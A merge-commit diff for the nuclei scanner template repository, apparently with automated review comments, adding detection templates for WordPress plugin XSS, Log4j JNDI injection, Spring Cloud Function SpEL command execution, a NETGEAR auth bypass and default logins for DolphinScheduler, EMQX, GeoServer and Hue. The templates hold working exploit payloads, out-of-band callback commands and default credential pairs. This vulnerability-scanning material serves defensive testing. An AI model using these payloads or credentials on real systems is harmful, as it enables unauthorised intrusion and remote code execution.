Merge branch 'projectdiscovery:master' into master

patch-1
idealphase 2022-03-28 14:05:48 +07:00 committed by GitHub
commit 06a553e4a4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
21 changed files with 1934 additions and 1433 deletions


@ -1,21 +1 @@
cnvd/2021/CNVD-2021-01931.yaml vulnerabilities/springboot/springboot-log4j-rce.yaml
cnvd/2021/CNVD-2021-14536.yaml
cves/2020/CVE-2020-17456.yaml
cves/2020/CVE-2020-27467.yaml
cves/2021/CVE-2021-41691.yaml
cves/2021/CVE-2021-42063.yaml
cves/2022/CVE-2022-0437.yaml
exposed-panels/avtech-avn801-camera-panel.yaml
exposed-panels/beyondtrust-login-server.yaml
exposed-panels/beyondtrust-panel.yaml
exposed-panels/directadmin-login-panel.yaml
exposed-panels/open-virtualization-manager-panel.yaml
misconfiguration/jolokia/jolokia-info-disclosure.yaml
misconfiguration/jolokia/jolokia-list.yaml
misconfiguration/jolokia/jolokia-mbean-search.yaml
technologies/open-virtualization-manager-detect.yaml
token-spray/api-cloudflare.yaml
vulnerabilities/huawei/huawei-hg255s-lfi.yaml
vulnerabilities/other/oracle-fatwire-lfi.yaml
vulnerabilities/other/tekon-info-leak.yaml
vulnerabilities/wordpress/wordpress-wp-cron.yaml


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1071 | daffainfo | 546 | cves | 1069 | info | 1094 | http | 2949 | | cve | 1080 | daffainfo | 550 | cves | 1079 | info | 1105 | http | 2983 |
| panel | 469 | dhiyaneshdk | 407 | exposed-panels | 471 | high | 794 | file | 57 | | panel | 475 | dhiyaneshdk | 411 | exposed-panels | 477 | high | 808 | file | 57 |
| lfi | 433 | pikpikcu | 313 | vulnerabilities | 422 | medium | 625 | network | 49 | | lfi | 437 | pikpikcu | 314 | vulnerabilities | 428 | medium | 630 | network | 49 |
| xss | 338 | pdteam | 257 | technologies | 227 | critical | 389 | dns | 17 | | xss | 344 | pdteam | 258 | technologies | 229 | critical | 390 | dns | 17 |
| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 173 | | | | wordpress | 334 | geeknik | 176 | exposures | 199 | low | 176 | | |
| exposure | 282 | dwisiswant0 | 165 | misconfiguration | 193 | unknown | 6 | | | | exposure | 283 | dwisiswant0 | 165 | misconfiguration | 195 | unknown | 6 | | |
| rce | 272 | 0x_akoko | 115 | workflows | 185 | | | | | | rce | 274 | 0x_akoko | 117 | workflows | 185 | | | | |
| cve2021 | 260 | princechaddha | 109 | token-spray | 149 | | | | | | cve2021 | 264 | gy741 | 112 | token-spray | 150 | | | | |
| tech | 238 | gy741 | 109 | default-logins | 78 | | | | | | tech | 240 | princechaddha | 109 | default-logins | 82 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | | | wp-plugin | 239 | pussycat0x | 107 | takeovers | 67 | | | | |
**236 directories, 3310 files**. **239 directories, 3325 files**.
</td> </td>
</tr> </tr>




@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1071 | daffainfo | 546 | cves | 1069 | info | 1094 | http | 2949 | | cve | 1080 | daffainfo | 550 | cves | 1079 | info | 1105 | http | 2983 |
| panel | 469 | dhiyaneshdk | 407 | exposed-panels | 471 | high | 794 | file | 57 | | panel | 475 | dhiyaneshdk | 411 | exposed-panels | 477 | high | 808 | file | 57 |
| lfi | 433 | pikpikcu | 313 | vulnerabilities | 422 | medium | 625 | network | 49 | | lfi | 437 | pikpikcu | 314 | vulnerabilities | 428 | medium | 630 | network | 49 |
| xss | 338 | pdteam | 257 | technologies | 227 | critical | 389 | dns | 17 | | xss | 344 | pdteam | 258 | technologies | 229 | critical | 390 | dns | 17 |
| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 173 | | | | wordpress | 334 | geeknik | 176 | exposures | 199 | low | 176 | | |
| exposure | 282 | dwisiswant0 | 165 | misconfiguration | 193 | unknown | 6 | | | | exposure | 283 | dwisiswant0 | 165 | misconfiguration | 195 | unknown | 6 | | |
| rce | 272 | 0x_akoko | 115 | workflows | 185 | | | | | | rce | 274 | 0x_akoko | 117 | workflows | 185 | | | | |
| cve2021 | 260 | princechaddha | 109 | token-spray | 149 | | | | | | cve2021 | 264 | gy741 | 112 | token-spray | 150 | | | | |
| tech | 238 | gy741 | 109 | default-logins | 78 | | | | | | tech | 240 | princechaddha | 109 | default-logins | 82 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | | | wp-plugin | 239 | pussycat0x | 107 | takeovers | 67 | | | | |


@ -0,0 +1,49 @@
id: CVE-2021-25055
info:
name: FeedWordPress < 2022.0123 - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: |
The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
reference:
- https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-25055
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=1 onerror=alert(document.domain)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
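Review bot: The login request at L96–L101 depends on `{{username}}` and `{{password}}`, which the template never defines and which have to be supplied at scan time, yet nothing in `info` tells the operator this; a run without them is either skipped as unresolved or sends the literal placeholders, and the template then silently never matches. Suggest extending the description with `Requires valid WordPress credentials supplied at runtime via the username and password variables (-var).` so the dependency is visible from the template itself. The same undocumented requirement applies to the CVE-2021-25112, CVE-2022-0148 and CVE-2022-0189 sections added in this commit, which reuse the identical login step.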


@ -0,0 +1,49 @@
id: CVE-2021-25112
info:
name: WHMCS Bridge < 6.4b - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: |
The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
reference:
- https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-25112
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src onerror=alert(document.domain)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -1,14 +1,14 @@
id: CVE-2021-41691 id: CVE-2021-41691
info: info:
name: openSIS Student Information System 8.0 SQl Injection Vulnerability name: OpenSIS Student Information System 8.0 - Authenticated SQL Injection
author: Bartu Utku SARP author: Bartu Utku SARP
severity: high severity: high
reference: reference:
- https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
- https://www.exploit-db.com/exploits/50637 - https://www.exploit-db.com/exploits/50637
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691
tags: cve,cve2021,opensis,sqli,auth tags: cve,cve2021,opensis,sqli,authenticated
requests: requests:
- raw: - raw:


@ -22,7 +22,11 @@ info:
requests: requests:
- raw: - raw:
- | - |
GET /?x=${jndi:ldap://${hostName}.{{interactsh-url}}/a} HTTP/1.1 GET /?x=${jndi:ldap://${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
Host: {{Hostname}}
- |
GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}} Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}} Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
@ -43,6 +47,7 @@ requests:
X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}} X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}} X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}
stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word


@ -0,0 +1,48 @@
id: CVE-2022-0148
info:
name: All-in-one Floating Contact Form < 2.0.4 - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: The plugin was vulnerable to reflected XSS on the my-sticky-elements-leads admin page.
reference:
- https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148
tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.40
cve-id: CVE-2022-0148
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src onerror=alert(`document.domain`) x">'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,53 @@
id: CVE-2022-0189
info:
name: WP RSS Aggregator < 4.20 - Authenticated Reflected XSS
author: DhiyaneshDK
severity: medium
description: |
The plugin does not sanitise and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/52a71bf1-b8bc-479e-b741-eb8fb9685014
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0189
tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2022-0189
cwe-id: CWE-79
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src onerror=alert(`document.domain`)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,39 @@
id: dolphinscheduler-default-login
info:
name: Apache DolphinScheduler Default Login
author: For3stCo1d
severity: high
reference: https://github.com/apache/dolphinscheduler
metadata:
shodan-query: http.title:"DolphinScheduler"
tags: apache,dolphinscheduler,default-login,oss
requests:
- raw:
- |
POST /dolphinscheduler/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName={{user}}&userPassword={{pass}}
attack: pitchfork
payloads:
user:
- admin
pass:
- dolphinscheduler123
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"msg":"login success"'
- '"sessionId":'
condition: and
- type: status
status:
- 200
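Review bot: The `info` block has no `description`, and the only `reference` (L305) is the project repository rather than anything that documents the credential being tested, so a reader of the scan output cannot tell what finding this is without opening the template. Suggest adding `description: Checks whether the factory default administrator account (admin / dolphinscheduler123) is still accepted by the DolphinScheduler login endpoint.` under `severity`, matching the sibling Hue template which does carry a description. Note that a successful match creates a real session on the target, which is worth stating for operators reviewing logs afterwards.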


@ -0,0 +1,63 @@
id: hue-default-credential
info:
name: Cloudera Hue Default Admin Login
author: For3stCo1d
severity: high
description: Hue default admin login was discovered.
reference: https://github.com/cloudera/hue
metadata:
shodan-query: title:"Hue - Welcome to Hue"
tags: hue,default-login,oss
requests:
- raw:
- |
GET /hue/accounts/login?next=/ HTTP/1.1
Host: {{Hostname}}
- |
POST /hue/accounts/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F
attack: pitchfork
payloads:
user:
- admin
- hue
- hadoop
- cloudera
pass:
- admin
- hue
- hadoop
- cloudera
cookie-reuse: true
extractors:
- type: regex
name: csrfmiddlewaretoken
part: body
internal: true
group: 1
regex:
- name='csrfmiddlewaretoken' value='(.+?)'
req-condition: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(tolower(body_1), 'welcome to hue')
- contains(tolower(all_headers_2), 'csrftoken=')
- contains(tolower(all_headers_2), 'sessionid=')
condition: and
- type: status
status:
- 302
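Review bot: The template id on L337, `hue-default-credential`, breaks the naming used by every other default-login template in this commit (`dolphinscheduler-default-login`, `emqx-default-login`, `geoserver-default-login`) and by its own `default-login` tag; `id: hue-default-login` would keep the set greppable and consistent. The `shodan-query` on L345 uses the bare `title:` filter where the DolphinScheduler template on L307 uses `http.title:`; both work on Shodan, but picking one form across the repository avoids churn. If the plain `status` matcher on L388–L390 is meant to apply to the POST response only, a short comment saying so would help, since with `req-condition: true` it is not obvious which response the non-DSL matcher is evaluated against.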


@ -0,0 +1,32 @@
id: emqx-default-login
info:
name: Emqx Default Login
author: For3stCo1d
severity: high
metadata:
shodan-query: http.favicon.hash:"-670975485"
tags: emqx,default-login
requests:
- raw:
- |
POST /api/v4/auth HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"username":"{{user}}","password":"{{pass}}"}
attack: pitchfork
payloads:
user:
- admin
pass:
- public
matchers:
- type: dsl
dsl:
- body == "{\"code\":0}"
- status_code == 200
condition: and
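Review bot: The request declares `Content-Type: application/x-www-form-urlencoded` on L408 while the body on L409 is a JSON document, so the header contradicts the payload; if the EMQX API dispatches on content type this request is rejected before the credentials are ever checked, producing a false negative. The fix is the single line `Content-Type: application/json`. The DSL check `body == "{\"code\":0}"` on L419 is also an exact string comparison and will stop matching on any whitespace or key-ordering change in the response; `contains(body, '"code":0')` would be more tolerant, presumably at no cost to precision, but confirm against a live response.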


@ -0,0 +1,37 @@
id: geoserver-default-login
info:
name: Geoserver Default Login
author: For3stCo1d
severity: high
metadata:
fofa-query: app="GeoServer"
tags: geoserver,default-login
requests:
- raw:
- |
POST /geoserver/j_spring_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}
attack: pitchfork
payloads:
user:
- admin
pass:
- geoserver
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(tolower(location), '/geoserver/web')"
- "!contains(tolower(location), 'error=true')"
condition: and
- type: status
status:
- 302
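Review bot: This template has no `description` and no `reference`, unlike the Hue and DolphinScheduler default-login templates added in the same commit, so a reviewer has nothing to check the tested credential pair against. Suggest adding `description: Checks whether the GeoServer web admin interface still accepts the factory default administrator credentials.` and a `reference` pointing at the vendor documentation that lists the default account. The matcher pair on L451–L452 (redirect to `/geoserver/web` without `error=true`) is a sound success signal and needs no change.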


@ -1,7 +1,7 @@
id: open-virtualization-manager-panel id: open-virtualization-manager-panel
info: info:
name: Open Virtualization Manager Userportal and Webadmin panel name: Open Virtualization Userportal & Webadmin Panel
author: idealphase author: idealphase
severity: info severity: info
description: open-source distributed virtualization solution, designed to manage your entire enterprise infrastructure. oVirt uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible. description: open-source distributed virtualization solution, designed to manage your entire enterprise infrastructure. oVirt uses the trusted KVM hypervisor and is built upon several other community projects, including libvirt, Gluster, PatternFly, and Ansible.


@ -1,7 +1,7 @@
id: jolokia-mbean-search id: jolokia-mbean-search
info: info:
name: Jolokia -Searching MBeans name: Jolokia - Searching MBeans
author: pussycat0x author: pussycat0x
severity: low severity: low
reference: reference:


@ -0,0 +1,19 @@
id: emqx-detection
info:
name: Emqx Detection
author: For3stCo1d
severity: info
tags: tech,emqx
requests:
- method: GET
path:
- "{{BaseURL}}/static/emq.ico"
matchers-condition: and
matchers:
- type: dsl
name: favicon
dsl:
- "status_code==200 && ('-670975485' == mmh3(base64_py(body)))"
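Review bot: The id on L481, `emqx-detection`, does not follow the `-detect` suffix the `technologies` directory uses (see `technologies/open-virtualization-manager-detect.yaml` in the file list on L28); `id: emqx-detect` would match the convention. `matchers-condition: and` on L491 is redundant with a single matcher and can be dropped. Since the favicon hash `-670975485` is the same value the sibling `emqx-default-login` template publishes as `shodan-query: http.favicon.hash:"-670975485"` (L401), carrying that `metadata` block here too would let operators pivot from detection to the panel query.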


@ -0,0 +1,27 @@
id: netgear-wac124-router-auth-bypass
info:
name: NETGEAR WAC124 Router Authentication Bypass
author: gy741
severity: high
description: |
This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability.
reference:
- https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
- https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044
tags: netgear,auth-bypass,router,iot
requests:
- method: GET
path:
- "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Enable Telnet"
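Review bot: The description on L507 reads "bypass authentication on affected of WAC124, AC2000 routers", which is garbled; suggest `This vulnerability allows network-adjacent attackers to bypass authentication on affected NETGEAR WAC124 and AC2000 routers. Authentication is not required to exploit this vulnerability.` The success signal is a single generic phrase, `Enable Telnet`, with no `part:` given (L521–L523); it defaults to the body, but stating `part: body` and, if the debug page exposes a second distinctive string, adding it under `words` would lower the false-positive rate on devices whose ordinary settings pages mention the same option — confirm against the referenced advisory.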


@ -0,0 +1,47 @@
id: springboot-log4j-rce
info:
name: Spring Boot Log4j Remote Code Injection
author: pdteam
severity: critical
remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
reference:
- https://logging.apache.org/log4j/2.x/security.html
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
tags: springboot,rce,oast,log4j
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2021-44228
cwe-id: CWE-502
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
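Review bot: The hostname regex is written twice, once as a matcher on L559 and again as an extractor on L568, so any future change to the pattern has to be mirrored by hand; a comment above the matcher such as `# keep in sync with the interactsh_request extractor below` would make that coupling explicit. The `info` block also lacks a `description`, even though `remediation` and a CVE classification are present; one sentence stating that the probe places a JNDI lookup string in the `X-Api-Version` header and confirms vulnerability through an out-of-band DNS interaction would complete it.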


@ -0,0 +1,33 @@
id: springcloud-function-spel-rce
info:
name: Spring Cloud Function SPEL RCE
author: Mr-xn
severity: critical
reference:
- https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
- https://github.com/cckuailong/spring-cloud-function-SpEL-RCE
tags: springcloud,rce
requests:
- raw:
- |
POST /{{rand_base(8)}} HTTP/1.1
Host: {{Hostname}}
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping {{interactsh-url}}")
Content-Type: application/x-www-form-urlencoded
{{rand_base(8)}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
condition: or
- type: status
status:
- 500
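Review bot: The probe on L587 executes `ping {{interactsh-url}}` on the target; on Linux hosts `ping` without a count does not terminate on its own, so every vulnerable instance scanned is left with a runaway process, which is avoidable for a check that only needs one DNS resolution. Bounding it, e.g. `ping -c 1 {{interactsh-url}}`, yields the same interaction without the lingering side effect, and the side effect should in any case be documented for operators. The template also has no `description` or `remediation` although the referenced fix commit is already listed on L579; `remediation: Upgrade to a Spring Cloud Function release that includes the referenced fix commit.` would be consistent with the springboot-log4j-rce template in this commit.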